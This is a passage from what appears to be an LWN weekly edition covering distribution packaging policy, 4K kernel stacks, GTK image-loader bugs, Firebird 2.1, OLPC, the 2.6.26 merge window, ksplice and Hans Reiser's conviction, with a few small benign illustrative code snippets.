distributions would like support for these to always be optional.  This
might actually start to be a problem for multimedia applications, as their
main goal is just to provide support for these patent-encumbered formats.
 Usage of GPL-incompatible libraries by GPL
  applications, and other forms of license mixing, is quite a big issue for
  almost all binary distributions.  Some distributions will not be able to
  legally redistribute packages with licensing issues.  This is why
  distributions often push for optional support for GnuTLS as a replacement
  for OpenSSL, or build packages without SSL support by default.  (In
  addition to license problems, SSL support is also encumbered with special
  cryptography legislation, which makes its handling even more of a
  problem).
 In both multimedia and cryptography there is the problem of
  patent-encumbered algorithms.  Even when the format
  itself is not encumbered, the algorithm used to generate the result might
  be.  Distributions want a way to opt out of some of the support in the
  software.
 Support for network analysis tools can also be a
  problem.  While the boundary between analysis and
  cracking can be quite thin, laws like the ones enacted in
  Germany are starting to make it difficult for distributions to carry tools
  that are even well inside the definition of network analysis rather
  than network cracking.


For some distributions, there are extra policies that depend on the
license used by the project itself. For instance, if the license disallows
changes to the source (verbatim copy only), it might prevent the
distribution from taking the proper steps to fix technical issues.

Each distribution has its philosophical goals, such as a focus on Free
Software or a focus on corporate users.  These goals will influence the
distribution's view of philosophical issues.  Companies tend to take a more
defensive look at these issues than community projects.  European projects
tend to be more lax when it comes to software patent problems, and other
countries don't enforce copyright laws.  These are the types of factors
that will affect a distribution's philosophical goals.

Conclusions

The issues described in this section can also
conflict directly with the goals of the upstream project (and they often
do), in which case the project is very unlikely to be packaged officially
by at least some distributions.

This is why I categorized these issues under the philosophical
name rather than technical. It's actually fairly common that
issues of this kind spark debates inside and outside projects and
distributions, as developers and maintainers have very different
feelings about them.

One example is a software package in which the team is composed entirely of
native English speakers. Such a project has a fair chance of starting without
considering that some users might expect the user interface to be available
in other languages. While this might sound a bit harsh, it's
often true.

It is nearly impossible for a project to address all of these issues
for every possible distribution. And it becomes even harder
when the project itself focuses on keeping the code as simple as
possible, even when that means ignoring features and optimizations
that require adding complexity.

For this reason, the issues listed here have to be taken as suggestions,
rather than requirements, depending on the original goals for the
project. If the project wants to be widely accepted though, it will need to
provide a good mitigation method for these issues.

Afterword

In addition to these issues, which relate directly to the source and
the software, there are some extra suggestions that can be given to
make the whole project friendlier to distributors, entailing process
and workflow changes.

Making it visible in the source code to whom and where patches and
suggestions should be sent is certainly a nice initial step. When preparing a patch
for software that misbehaves, it's usually simpler to read the
documentation shipped with the software.  Distribution developers are less
likely to open a browser to check the homepage of the software, looking for
the address to use.  This also means that you should always make sure to
update your address referenced in the software documentation. If you change
your email address, and the old one is no longer reachable, it is a good
idea to re-roll the tarball even if no code changes are present (in these
cases, adding a suffix to the tarball is better than changing the version).

Even better, having a public way to track patches is often useful:
distributions can easily see if someone else fixed that issue before, and
how. It might save a downstream maintainer some work, and it helps having a
solution that works for more than one person at a time.

Acknowledging the patches, and pointing out what is not going to work,
is something that helps reduce the frustration for maintainers, as
it allows them to better suit the coding style of the project each
time. Ignoring a patch entirely is not a good idea, as these patches are
rarely non-issues.

It's also important to notice that the patches almost never
concern optimizations. Most distributions are generally less concerned with
the performance of the software than with its correctness as defined by their
own policies.  Distributions would often prefer to reduce the speed of the
software if that makes it better follow their policy.  This also has to be
understood and accepted, and at best worked around by either improving
the optimization, allowing an option, or making a trade-off.

Having a public repository for the source is often helpful, but often not
in major ways.  While it makes it easier for the downstream maintainers to
check the progress of the code, it might not be trivial to identify where
the correct source is.  If the project uses branches it might well be that
the upstream developers have already moved away from the broken code by the
time a distribution tries to package it. If a repository is available,
regular tagging and branching is helpful, and makes it easier for a
maintainer to find what has actually changed between two or more versions.

Finally

This article cannot cover all the possible requests that a
distribution might have, and it does not even get close to all the possible
requests by all possible distributions.  There are even more requests
relating to portability, for distributions that target particular
non-mainstream hardware (e.g. distributions targeting embedded devices, like
OpenWRT) or distributions for other (Free and non-Free) operating systems
(like Cygwin, Fink or FreeBSD ports). The remaining issues have to be dealt
with on an incremental basis, in collaboration with the downstream
maintainers for that distribution.

Following these practices might make it easier for those people to contact
the upstream developers to work out a solution.  They make the project
appear friendlier, just as much as saying "Please let us know how we can
improve your users' experience with our software." They change the
mindset of a project so that it is less frustrating for packagers to
prepare it for distributions. Going against all these points not only makes
the job harder for the distributors, but might give the (wrong) idea that the
project is not open to accommodating distributions.

		4K stacks by default?


 The kernel stack is a rather important chunk of memory in any Linux
system.  The unpleasant kernel memory corruption that results from
overflowing it is something that is to be avoided at all costs.  But the
stack is allocated for each process and thread in the system, so those who
are looking to reduce memory usage target the 8K stack used by default on
x86.  In addition, an 8K stack requires two physically contiguous
pages (an "order 1" allocation) which
can be difficult to satisfy on a running system due to fragmentation. 
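The arithmetic behind the "order 1" remark and the memory savings can be sketched as follows. The 4096-byte page size is the usual x86 value; the helper names and the thread count of 1000 are purely illustrative assumptions.

```python
PAGE_SIZE = 4096  # bytes; the usual x86 page size


def allocation_order(size_bytes, page_size=PAGE_SIZE):
    """Smallest n such that 2**n contiguous pages can hold size_bytes."""
    pages = -(-size_bytes // page_size)  # ceiling division
    order = 0
    while (1 << order) < pages:
        order += 1
    return order


def stack_memory(num_threads, stack_bytes):
    """Total kernel-stack memory for the given number of threads."""
    return num_threads * stack_bytes


# An 8K stack needs two contiguous pages; a 4K stack needs only one.
assert allocation_order(8192) == 1
assert allocation_order(4096) == 0

# Hypothetical system with 1000 threads: bytes saved by halving the stack.
saved = stack_memory(1000, 8192) - stack_memory(1000, 4096)
```

An order-0 request can be satisfied by any free page, which is why it does not suffer from fragmentation in the way an order-1 request can.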

Linux has had optional support for 4K stacks for nearly four years now, with Fedora
and RHEL enabling it on the kernels they ship, but a recent patch to make
it the default for x86 has raised some eyebrows.  Andrew Morton sees it as
bypassing the normal patch submission process: 

This patch will cause kernels to crash.

It has no changelog which explains or justifies the alteration.

afaict the patch was not posted to the mailing list and was not
discussed or reviewed.


It is not surprising that patch author Ingo Molnar sees things a little differently:

what mainline kernels crash and how will they crash? Fedora and other 
distros have had 4K stacks enabled for years [ ... ]
and we've conducted tens of thousands of bootup tests with all sorts of 
drivers and kernel options enabled and have yet to see a single crash 
due to 4K stacks. So basically the kernel default just follows the 
common distro default now. (distros and users can still disable it)


As described in an earlier LWN
article, the main concerns about only providing 4K for the kernel stack
are for complicated storage configurations or for people using NDISwrapper.  There is
fairly high disdain for the latter case—as it is done to load
proprietary Windows drivers into the kernel—but it could lead to a
pretty hideous failure in the former.  Data corruption certainly seems like
a possibility, but, regardless, a kernel crash is definitely not what an
administrator wants to have to deal with.


Arjan van de Ven summarized the current
state, noting that NDISwrapper really requires 12K stacks, so having 8K
only makes it less likely those kernels will crash.  The stacking of
multiple storage drivers (network filesystems, device mapper, RAID, etc.)
is a bigger issue:

we need to know which they are, and then solve them, because even on x86-64
with 8k stacks they can be a problem (just because the stack frames are
bigger, although not quite double, there). 


Proponents of default 4K stacks seem to be puzzled as to why there are objections
to the change, since there have been no problems with Red Hat kernels.  But
Andi Kleen notes:

One way they do that is by marking significant parts of the kernel
unsupported. I don't think that's an option for mainline.


The xfs filesystem, which is not supported in RHEL or Fedora, can potentially use a great deal of stack. This leads
some kernel hackers to worry that a complicated configuration that uses it,
an "nfs+xfs+md+scsi writeback" configuration as Eric Sandeen puts it, could overflow.  Work is already
proceeding to reduce the xfs stack usage, but it clearly is a problem that
xfs hackers have seen.  David Chinner responds
to a question about stack overflows:

We see them regularly enough on x86 to know that the first question
to any strange crash is "are you using 4k stacks?". In comparison,
I have never heard of a single stack overflow on x86_64....


It would seem premature to make 4K stacks the default.  There is good
reason to believe that folks using xfs could run into problems.  But there
is a larger issue, one that Morton brought up in his initial message, then reiterated later in the thread:

Anyway.  We should be having this sort of discussion _before_ a patch
gets merged, no?


The memory savings can be
significant, especially in the embedded world.  Coupled with the
elimination of order 1 allocations each time a process gets created, there is good
reason to keep working toward 4K stacks by default.  As of this writing,
4K stacks remain the default in Linus's tree, but that could change
before long. 


		Image handling vulnerabilities


Bugs that linger for eight years without a fix are probably annoying to
whoever reported them; perhaps others as well.  When those bugs have
possible security implications, it is hard to see how they can remain
unfixed for even eight months, let alone years, but that appears to be the case
with some GTK image handling bugs.  Code to handle image formats has been
the source of numerous vulnerabilities along the way, which makes it even
harder to see why these have languished so long. 


A call for ideas for a hackfest on the GNOME foundation mailing list seems
like a bit of a strange place to find information about vulnerabilities,
but in the ensuing thread, Michael Chudobiak brought up some bugs that he would like to see addressed,
perhaps as part of a hackfest: 

I'd like to suggest one possible topic: The pixbuf loaders. They're slow 
and memory intensive, and this drags down anything that needs thumbnails 
(Nautilus, etc). There is a lot of opportunity to improve the 
responsiveness of the desktop here.


The bugs he listed were from 2002 (80925), 2004 (142428), and
2008 (522803), but
Alan Cox mentioned that he reported one of them as a GNOME
security bug "about eight years ago".  In his opinion all of the bugs were
of the "well known, never fixed" variety.  Because the code in question
lives in GTK—used by many GNOME applications—"quite a few gnome
apps fed small compressed images explode". 


The basic problem is that the routines handling images create the
full-resolution image in memory regardless of the size requested.  In
addition, various memory-intensive techniques are used to scale the image
 to the requested size.  This impacts Nautilus and other GNOME programs
that create thumbnails of large images.
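A rough sense of the cost can be had from simple arithmetic. The sketch below is only a back-of-the-envelope illustration: the four bytes per pixel, the image dimensions, and the thumbnail size are all assumptions chosen for the example, and it says nothing about the additional memory used while scaling.

```python
BYTES_PER_PIXEL = 4  # assumption: 8 bits each for red, green, blue, alpha


def decoded_bytes(width, height, bytes_per_pixel=BYTES_PER_PIXEL):
    """Memory needed to hold one fully decoded image of the given size."""
    return width * height * bytes_per_pixel


full = decoded_bytes(10000, 10000)  # hypothetical large source image
thumb = decoded_bytes(128, 128)     # hypothetical thumbnail
print(full, thumb, full // thumb)
```

With these made-up numbers, the full-resolution buffer is several thousand times larger than the thumbnail that was actually requested.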


Presumably, a denial of service, at a minimum, can result from these
operations, though there may be other ways to exploit any program crashes
that result.  Cox has a plan to see them get fixed: 


Unfortunately they are well known but nobody seems to care. I'll forward
your message to the vendor security list and we'll see what happens.
Probably the bug just needs to be made *very* public to incentivise
people to fix it 8)


The vendor security list, often abbreviated vendor-sec, is a closed mailing
list for distribution security teams to exchange information about vulnerabilities in
various programs.  It is closed so that bugs that are not publicly known
can be freely discussed.  Whether Cox's posting to that list spurs any
action remains to be seen.


It is a rare week where LWN does not report some kind of image handling
botch as a new vulnerability.  This week, a cups vulnerability in handling
PNG files could lead to a denial of service; last week we reported an Opera
vulnerability in handling images in HTML canvas elements that could
possibly lead to arbitrary code execution.  Image handling
is an area where all bugs need to be scrutinized carefully for potential
security issues. 


Hopefully, part of the problem is that the GNOME hackers did not realize
the security implications of the bugs.  There do seem to have been ample
complaints about performance problems, though, to have prompted some kind of
action over the last six or eight years.  This is a set of related bugs that have
seemingly been overlooked for a long time.  Perhaps that time is now coming
to an end. 


		Firebird adds new features with version 2.1


Firebird
is one of the popular open-source relational database management systems
(RDBMS) that run under Linux.  From the
About Firebird document:


Firebird is a relational database offering many ANSI SQL standard features that runs on Linux, Windows, and a variety of Unix platforms. Firebird offers excellent concurrency, high performance, and powerful language support for stored procedures and triggers. It has been used in production systems, under a variety of names, since 1981.
The Firebird Project is a commercially independent project of C and C++ programmers, technical advisors and supporters developing and enhancing a multi-platform relational database management system based on the source code released by Inprise Corp (now known as Borland Software Corp) on 25 July, 2000.


Stable version 2.1 of Firebird was announced on April 18, 2008:
"Firebird 2.1 is a full version release that builds on the architectural changes introduced in the V.2.0 series. Thanks to all who have field-tested the Alphas and Betas during 2007 and the first quarter of 2008 we have a release that is bright with new features and improvements, including the long-awaited global temporary tables, a catalogue of new run-time monitoring mechanisms, database triggers and the injection of dozens of internal functions into the SQL language set."


A summary of new features from the release announcement includes:

 Database triggers, user-defined PSQL modules that fire on connection-level and transaction-level events, have been added.
 Global temporary tables are now available for the handling of non-persistent data.
 New common table expressions are available for making dynamic recursive queries.
 An optional RETURNING clause which supports update, insert and delete operations has been added.
 New MERGE and UPDATE OR INSERT statements are available for performing conditional operations.
 The new LIST() function can retrieve information in the form of a comma-separated list.
 New built-in functions have been added to replace UDF library calls.
 Text BLOBs up to 32K in length can now masquerade as varchars.
 Procedural SQL (PSQL) local variables can now be declared using domains.
 PSQL variables and arguments can be COLLATEd.
 A new DDL CREATE COLLATION command has been added, replacing the need for a script.
 New Unicode collations can be applied to any character set.
 The ability to perform run-time database snapshot monitoring via SQL has been added.
 The performance of the remote protocol has been improved to better support operation on slow networks.


More details on the version 2.1 release are available in the
release notes [PDF].  The document should be read by those who
are upgrading from older versions of Firebird.
The release notes list a number of additional changes, including:


 The reworking of the on disk structure (ODS).
 Improvements to the PSQL error stack trace.
 The availability of more context information.
 A new fbsvcmgr command-line interface to the Services API.
 Support for named cursors.
 Implementation of the new XNET local transport protocol.
 A rework of the garbage collection mechanism.
 The Services API to Classic architecture port has been finished.
 Lock timeouts are now available for WAIT transactions.
 New Database Shutdown Modes have been added.
 The NULL handling for UDFs has been improved.
 There have been synchronization logic improvements.
 Support has been added for 64 bit platforms.
 Larger record enumeration limits are now supported.
 Debugging improvements have been added.
 Connection handling on the POSIX superserver has been improved.
 The PSQL invariant tracking system has been reworked.
 The ROLLBACK RETAIN clause is now supported.
 There have been improvements made to the optimizer routines.
 Numerous Windows improvements have been added.


Clearly, the Firebird developers have been busy working on this software.
If the above lists aren't enough, the Firebird home page
notes that there is a mechanism for users to request more new features.
The development roadmap for 2008 gives an idea of where the
project is headed.  Several bug fix releases are scheduled for version
2.1 in the near future and work on the next major release, version 2.5,
is already in progress.
Firebird is available for download here.


		OLPC at a turning point


It looks like hard times for the One Laptop Per Child project.  Quite a few
key developers have left, including Mary Lou Jepsen, Ivan Krstić,
Andres Salomon, and Walter Bender.  Laptop deployments are far below the
several million that the project had hoped for by this time, and many of
the goals for the system's software have not been achieved.  There is
persistent talk of supporting Windows, with suggestions that Linux could be
dropped altogether.  An ongoing
thread on the project's development mailing list shows that quite a few
participants are concerned about where things are going.  To many, it
seems, OLPC is about to go down as a noble failure.


These rumors may be just a bit premature, though.  When considering what
may really come of OLPC, it's worth keeping a few things in mind.


One of those is the fact that the project has just completed a major push
to its first mass-production system.  Your editor has watched the project
closely enough to see that, as with many such efforts, the people involved
have been putting in lots of long hours to get the job done.  When this kind
of pressure is lifted, it is natural to take a break, catch up on the house
work, and, perhaps, find a new job.  So the departure of some key staff at
this stage is not entirely surprising.


A look at the state of OLPC's software suggests that the project had set an
overly ambitious set of goals for its first release.  When that happens,
one must jettison some objectives; the later that this is done, the more
likely it is that the wrong objectives will be tossed overboard.  There are
signs that OLPC tried to do too much for too long, with an end result
which is not as stable, as fast, or as fully-featured as one would like.
As many people close to the project have noted, the laptop's software
remains immature.  But, as former president Walter Bender put it:


	While [we] have heard a lot of noise about performance in the media and
	from some members of the development community, it has not, in my
	experience been a major road-block in the school trials and
	deployments. There are lots of bugs and lots of things that could
	be improved upon, and these should certainly be addressed, but the
	characterizations being made in this thread do not reflect the
	realities of the OLPC deployments--the children and teachers are
	using the laptops and are learning.


Finally, the number of laptops delivered to children is far below the
level the project had planned upon.  Fewer deployments means a lower impact
for the project, but it also cannot be helping to create the economies of
scale the project had counted on to push the cost down.  There have also
been some embarrassing failures along the way, including the misplacing of a
large number of "Give one get one" orders until after it was too late to
include them in the manufacturing run.


All of the above points to a need to make some changes in how the project
is run.  Changes always create uncertainty, so it would be surprising if
OLPC participants were not a little nervous at the moment.


What happens in the next few months will likely determine OLPC's fate.  The
project's leadership has famously said in the past that OLPC is an
education project, not a laptop project.  Some people have recently expressed concerns that, in fact, OLPC is
turning into a laptop project, with deployment numbers being the main
goal.  Nicholas Negroponte doesn't help when he allows
himself to be quoted as being "mainly concerned with putting as
many laptops as possible in children's hands."  If OLPC becomes
primarily a low-cost laptop vendor, and especially if it goes to
proprietary operating systems as a means toward that end, it will lose much
of the community that has grown up around the project.


And that would be a shame.  There is great beauty in the idea of putting a
well-designed learning tool into the hands of children and empowering those
children by providing a system which is completely open and hackable.  A
large and motivated community of highly-capable people came together behind
that vision and did their best to rethink how this technology should work
and create something better.  Deployment groups in a number of countries
have gotten the resulting systems into the hands of thousands of children,
and many of them are reporting good results.  A lot of good things have
happened here, and it doesn't have to end now.


But it might end soon.  To pull things together, the project will have to
communicate a clearer vision of where it plans to go with its
software at all levels; Mr. Negroponte's statement of continued support for
Sugar appears to be an attempt to start this process.  The operational
side of the project needs to get its act together.  Some transparency on,
for example, what is being done with donation money and what agreements
have been made with outside corporations, would be most helpful.  And, most
of all, the group of volunteers working with this project have to be
convinced anew that they are not wasting their time.  If the project's
leadership can manage all of that, there may well be great things coming
from OLPC in the future.

		The 2.6.26 merge window, part 2


Since last week's summary was
written, another 3700 changesets have found their way into the
mainline git repository.  The most significant user-visible changes
include:


 New drivers have been merged for Wolfson WM9713 codecs,
     TI DAVINCI AC97 sound chips,
     Emagic Audiowerk 2 soundcards,
     x86 PC speakers (new driver which makes them look like sound cards),
     Asus AV100 (Xonar DX) sound cards,
     Micron MT9M001 and MT9V022 cameras,
     PXA27x Quick Capture cameras,
     Kworld ATSC 120 tuners,
     cx23417 MPEG encoders,
     Integrant ITD1000 tuners,
     Philips TDA10048HN-based demodulators,
     Philips SAA7171/3/4 audio/video decoders (the last out-of-tree IVTV
     driver),
     Auvitek AU8522 demodulators,
     Samsung S5H1411-based tuners,
     framebuffer, keyboard, and mouse virtual devices (for Xen),
     several Wolfson Microelectronics touchscreens,
     wireless Xbox 360 controllers,
     Zhen Hua PPM-4CH transmitters,
     SPCP8x5 USB to serial adaptors,
     NCR 53c9x SCSI controllers (replacement driver),
     Freescale 8610 and 5121 display interface units,
     Intel 965G/965GM integrated graphics controllers,
     TI OMAP sound controllers (including the one on the Nokia 810),
     Eee PC function keys, and
     Intel IXP4xx Ethernet devices.


 There is now "basic" support for braille screen readers.

 Support for the One Laptop Per Child XO architecture has been merged 
     into the mainline.

 The new virtual files found in /proc/pid/mountinfo 
     provide information on all filesystem mounts visible to the relevant
     process. 

 The new virtual file /proc/vmallocinfo displays information
     on use of vmalloc space within the kernel.

 The SPARC Niagara architecture now has NUMA support.

 The Xen balloon driver (allowing memory to be added to or removed from
     virtual guests) has been merged.

 By default, /dev/mem can no longer be used to access RAM;
     Fedora and Red Hat have applied this patch for years, but now it has
     found its way into the mainline.

 The KVM virtualization subsystem now supports the S/390, PowerPC
     440, and ia64 architectures.

 Per-process "securebits" are supported.  These bits control how a
     process's capability bits are managed; the patch is intended to help
     those who would transition over to a fully capability-based system.
     See this article for a
     more detailed description of this feature.

 The getrusage() system call has a new RUSAGE_THREAD
     option which causes it to return information about the current thread
     only. 

 The device whitelist control group patch (described briefly in this article) has been
     merged. 

 It is now possible to create and use partitions on network block
     devices (NBD).

 The audit subsystem can now test events against the type of the file
     being operated upon.

 The VFS now makes backing device information available under
     /sys/class/bdi.  Interested people can look at per-device
     readahead and writeback variables there.

 The FUSE filesystem now supports the creation of shared writable
     memory mappings.
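
As an illustration of one item from the list above, the new RUSAGE_THREAD option to getrusage() might be used along these lines. This is a sketch only: the helper name thread_cpu_usec() is invented here, and the fallback definition assumes the value (1) found in the Linux kernel headers for C libraries which do not yet export the constant.

```c
#define _GNU_SOURCE           /* glibc exposes RUSAGE_THREAD only with this */
#include <sys/time.h>
#include <sys/resource.h>

#ifndef RUSAGE_THREAD
#define RUSAGE_THREAD 1       /* assumed: value from the Linux kernel headers */
#endif

/* Store in *usec the CPU time (user plus system, in microseconds) consumed
 * by the calling thread only.  Returns 0 on success, -1 on failure, as
 * would happen on a kernel which predates the option. */
int thread_cpu_usec(long long *usec)
{
    struct rusage ru;

    if (getrusage(RUSAGE_THREAD, &ru) != 0)
        return -1;

    *usec = (ru.ru_utime.tv_sec + ru.ru_stime.tv_sec) * 1000000LL
          + ru.ru_utime.tv_usec + ru.ru_stime.tv_usec;
    return 0;
}
```

A worker thread could call this helper before and after a unit of work to see what that work cost, without the numbers being polluted by the rest of the process.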


Changes visible to kernel developers include:


 ioremap() on the x86 architecture will now always return an 
     uncached mapping.  Previously, it had taken a more relaxed approach,
     leaving the caching as the BIOS had set it up.  The practical result
     was to almost always create uncached mappings, but with
     occasional exceptions.  Drivers which depend on a cached mapping will
     now break; they will need to use ioremap_cache() instead.

 The Video4Linux2 API now defines a set of controls for camera devices; 
     they allow user space to work with parameters like exposure type, tilt
     and pan, focus, and more.

 On the x86 architecture, there is a new configuration parameter which
     allows gcc to make its own decisions about the inlining of functions,
     even when functions are declared inline.  In some cases, this
     option can reduce the size of the kernel's text segment by over 2%.

 The legacy IDE layer has gone through a lot of internal changes which
     will break any remaining IDE drivers.

 The nopage() virtual memory area operation has been removed;
     all in-tree code is now using fault() instead.

 The SLUB allocator supports a new sysfs file
     (/sys/kernel/slab/name/order) which allows system
     administrators to change the size of page allocations used by the
     named slab.

 A condition which triggers a warning from WARN_ON will now
     also taint the kernel.

 The get_info() interface for /proc files has been
     removed.  There is also a new function for creating /proc
     files which takes an additional data pointer, ensuring that
     it will be set in the resulting proc_dir_entry structure before
     user space can try to access it.

 The object debugging
     infrastructure has been merged.


The merge window remains open; tune in next week for (what should be) the
final set of changes merged for 2.6.26.

		Ksplice: kernel patches without reboots


The kernel developers are generally quite good about responding to security
problems.  Once a vulnerability in the kernel has been found, a patch comes
out in short order; system administrators can then apply the patch (or get
a patched kernel from their distributor), reboot the system, and get on
with life knowing that the vulnerability has been fixed.  It is a system
which works pretty well.


One little problem remains, though: rebooting the system is a pain.  At a
minimum, it requires a few minutes of down time.  In many situations, that
down time cannot be tolerated.  Reboots also disrupt any ongoing work,
break existing network connections, and can cause the loss of results from
long-running processes.  And, most importantly of all, reboots prove
traumatic for a certain subset of Linux administrators who prize a long
uptime above almost all other things.  Administrators currently have to
choose between multi-year uptimes and security fixes; anything which frees
them from a dilemma of this magnitude can only be welcome.


That "anything" might just be a recently-announced project called ksplice.  With ksplice, system
administrators can have the best of both worlds: security fixes without
unsightly reboots.


An in-depth explanation of how ksplice works can be found in this document [PDF].
In short, ksplice requires as input the source tree for the running kernel
and the security patch.  It will then build two kernels, one with the patch
and one without; the kernels are built with a special set of options which
makes it easy to figure out which functions change as a result of the
patch.  The two kernels will be compared, with the purpose of finding those
functions.  Changes can propagate further than one might expect, especially
if, for example, an inline function is modified.


Once a list of changed functions has been made, the updated code for those
functions is packaged into a kernel module and loaded into the system.
Then comes the tricky part: getting the
running kernel to start using the new code.  That requires patching the
running code, which is a risky thing to do.  Ksplice starts with a call to
stop_machine_run(), which dumps a high-priority thread onto each
processor, thus taking control of all processors in the system.  It then
examines all threads in the system to ensure that none of them are running
in the functions to be replaced.  If none are, trampoline jumps are patched into
the beginning of each replaced function (they "bounce" the call to the old
code into the replacement code) and life continues.  Otherwise
ksplice will back off and try again later.
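
The all-or-nothing nature of that check can be modeled in user space. The sketch below is not ksplice code; the structures and function names are hypothetical, each thread is reduced to a list of function ids on its call stack, and "installing a trampoline" is reduced to setting a flag. The real thing performs the check with every processor captured, so the threads cannot move while they are being examined; the model leaves that part out.

```c
#include <stddef.h>

#define MAX_DEPTH 8

/* Hypothetical model of one thread: the ids of the functions currently
 * on its call stack. */
struct thread_model {
    int stack[MAX_DEPTH];
    size_t depth;
};

/* Hypothetical model of a function to be replaced. */
struct func_model {
    int id;
    int redirected;   /* 1 once a "trampoline" points at the new code */
};

/* Return 1 if any thread has function `id` somewhere on its stack. */
int function_in_use(const struct thread_model *threads, size_t nthreads, int id)
{
    for (size_t t = 0; t < nthreads; t++)
        for (size_t d = 0; d < threads[t].depth; d++)
            if (threads[t].stack[d] == id)
                return 1;
    return 0;
}

/* Install every trampoline only if none of the functions to be replaced
 * is in use; otherwise change nothing and return -1 so that the caller
 * can back off and retry later. */
int try_apply(struct func_model *funcs, size_t nfuncs,
              const struct thread_model *threads, size_t nthreads)
{
    for (size_t f = 0; f < nfuncs; f++)
        if (function_in_use(threads, nthreads, funcs[f].id))
            return -1;

    for (size_t f = 0; f < nfuncs; f++)
        funcs[f].redirected = 1;
    return 0;
}
```

The important property is that a failed attempt leaves every function untouched; a half-applied patch, with some functions redirected and others not, would be worse than no patch at all.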


This method imposes a number of limitations.  One is that only code changes
can be patched in with ksplice; patches which make changes to data
structures cannot be accommodated.  Another comes from the retry-based
approach to ensuring that no threads are running in the patched functions;
what happens if one of those functions is never free?  Kernel functions
like schedule(), sys_poll(), or sys_waitid() are
likely to always have processes running within them.  In cases like this,
ksplice will eventually give up and inform the user that the patch cannot
be done; it is simply not possible to make changes to those particular
functions.


These limitations mean that, out of 50 security patches examined by the
ksplice developers, eight could not be applied with ksplice.  So multi-year
uptimes are probably still incompatible with the application of all
security patches.  Even so, ksplice certainly has the potential to reduce
patch-related downtime considerably.  Chances are good that there will be a
fair amount of interest in ksplice in sites running high-uptime,
mission-critical systems.


There are a few things in the way of an immediate merge of this code into the
mainline.  One is a matter of coding quality and can be fixed.  Then, there
is the matter of the lead developer being
unconvinced that merging this code makes sense since it is,
essentially, a standalone feature.  Andi Kleen's response made the (usual) reasons for merging
the code clear:


	To be honest you weren't the first to come up with something like
	this (although you're the first to post to l-k as far as I
	know). But the usual problem of something that is kept out of tree
	is that it eventually bitrots and gets forgotten. The only sane way
	to make such extensions a generically usable linux feature is to
	merge them to mainline.


So, presumably, the code will eventually be proposed for a mainline merge.
But there is one other little difficulty pointed out by Tomasz Chmielewski: 
Microsoft holds a
patent described this way:


	A system and method for automatically updating software components
	on a running computer system without requiring any interruption of
	service. A software module is hotpatched by loading a patch into
	memory and modifying an instruction in the original module to jump
	to the patch.


Microsoft came up with this novel new technique in the distant past: 2002.
The posting immediately brought out a crowd of surprised graybeards who
distinctly remember using such techniques on their PDP-11 systems some
decades before Microsoft "invented" hot-patching.  The basic claim of the
patent would thus appear to be invalidated by some decades' worth of prior
art, but some of the dependent claims include features (such as capturing
all other processors on the system) which were unlikely to be useful on
PDP-11s.  

Given that the kernel developers are now well aware of this
patent, they must take it into account when deciding whether to accept this
code into the mainline.  It would not be surprising if they chose to avoid
baiting the Microsoft FUD machine in this way, even if they all agreed that
the patent lacked validity.  So a promising technology risks being left out
of the kernel as the result of a software patent which was filed at least
30 years too late.

		On the conviction of Hans Reiser


On April 28, a California jury found Hans Reiser guilty of first-degree
murder.  There has been a lot of speculation in the press, both before and
after the conviction, on what the loss of Mr. Reiser will mean for the
Linux community.  Much of that speculation, it seems, lacks an
understanding of what Mr. Reiser's role in the community really was.  Your
editor will take no position on whether his conviction was correct or just.
But there are things to be said about what this conviction will mean.


Hans Reiser was, of course, the designer (and, to an extent, implementer)
of the reiserfs filesystem.  When it was merged, reiserfs had the
distinction of being the first journaling filesystem for Linux which was
intended for general use; it also offered good performance in some
situations, especially those involving lots of small files.  Reiserfs saw a
significant amount of use and was adopted by a handful of distributors.
There are, doubtless, quite a few reiserfs deployments still operating out
there.


Mr. Reiser's role in reiserfs development and maintenance ended some years
ago, though.  He stopped work on it when reiser4 development started, and
even opposed the incorporation
of improvements done by others.  Reiserfs 
continues to be maintained independently of its creator, though there is
not much interest in adding features to it at this point.  Reiserfs is
nearing the end of its run, and nothing which happened this week has
changed that situation in any way.


There is more concern about what will happen with Reiser4, Mr. Reiser's
next generation filesystem.  Many reports have suggested that current
events spell the end for this project, but it is worth taking a look at the
longer history.  Reiser4 is not exactly new; it was first posted in 2002.  Mr. Reiser made
an unsuccessful effort to get it merged for the 2.6.0 kernel, and tried again frequently
thereafter.  He blamed commercial interests and
politics for his failure in this regard, but the real situation is more
straightforward than that.


Reiser4 tried to do a number of things very differently from other
filesystems.  It included some very non-POSIX semantics which raised red
flags within the development community.  There was a multipurpose
reiser4() system call which implemented a wide range of features
and included an in-kernel interpreter for a special language.  There was a
low-level plugin mechanism which raised concerns (not all justified) about
varying on-disk formats and proprietary formats.  Reiser4 did many things
at the filesystem level that others thought should be done at the virtual
filesystem level instead.  The "files as directories" feature, beyond
striking people as strange, opened up a wide range of trivial deadlock
scenarios.


In summary, this code was nowhere near ready for inclusion into the
mainline kernel.  Kernel development projects which are done in isolation
often encounter this kind of surprise when they are finally posted to the
development community. 


Over the next few years work on reiser4 continued.  Many of the problems
were solved by simply removing most of the features which made reiser4
unique, turning it into just another filesystem.  Once you have just
another filesystem, attention will turn to performance; in this case, many
people found that they got benchmark results which differed from those
posted by Mr. Reiser.  Community interest in this filesystem fell over
time, and the development rate fell as well.  There was still work
happening to prepare reiser4 for the mainline kernel when Mr. Reiser was
arrested, but it was moving slowly.


Perhaps the biggest obstacle to the inclusion of reiser4, though, was the
confrontational approach taken toward the rest of the community.
When developers pointed out problems with reiser4, Mr. Reiser had a
tendency to question their motives rather than pay attention to what they
were saying.  His interactions with the community were characterized by
statements like:


	What makes you think kernel developers have a deep understanding of
	the value of connectivity in the OS? They don't. The average kernel
	developer is not particularly bright.


A number of developers reached a point where they simply chose not to
engage with him any more.  By rejecting the development community,
Mr. Reiser remained forever an outsider to it.


And that is why the practical effect of Mr. Reiser's conviction on the
community will be relatively small, at least in the short term.  As
brilliant as he is, his effectiveness was limited by his disregard for the
rest of the community and his certainty of always being right.  He could
have accomplished much more with a different approach.


That said, his loss is unfortunate.  He did prove able, over a number of
years, to raise funds for Linux filesystem work, and the community
benefited from that work.  Some of the reiser4 developers are still
interested in working on that code, and they still submit patches.  But now
nobody is paying them to do that work, which puts the whole enterprise in
danger.  There are limits to how long reiser4 development can be carried
forward as a labor of love.


The biggest loss, though, is elsewhere.  More than anybody else, Mr. Reiser
put a lot of thought into what our systems should look like in the future.
He saw capable filesystems as the way to make our systems far more powerful
than they are now.  In a world where the filesystem was the only namespace
of any significance on the system, all objects would be equal and the
number of potential connections between them would explode.  His long-term
goal was not (just) better benchmarks; it was to create a filesystem which
could serve as this all-encompassing namespace.  It was a radical idea, and,
perhaps, impractical.  But our future comes from ideas like that.


After a few relatively quiet years, there is now a flurry of activity
